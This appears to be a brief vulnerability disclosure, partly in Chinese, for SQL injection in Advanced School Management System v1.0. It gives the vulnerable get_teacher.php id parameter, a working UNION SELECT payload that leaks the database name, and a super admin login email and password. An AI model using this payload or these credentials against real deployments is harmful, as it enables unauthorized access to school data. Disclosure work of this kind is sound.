关键信息 漏洞标题 Advanced School Management System v1.0 has SQL Injection 登录账户 Super Admin Account: suarez081119@gmail.com / 12345 漏洞文件及位置 Vulnerability File: /school/model/get_teacher.php?id= Vulnerability Location: /school/model/get_teacher.php?id=,id SQL Injection Payload Payload: /school/model/get_teacher.php?id=-10%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ - Leak place: id 数据库名 Current Database Name: std_db, length is 6 示例 HTTP 请求 响应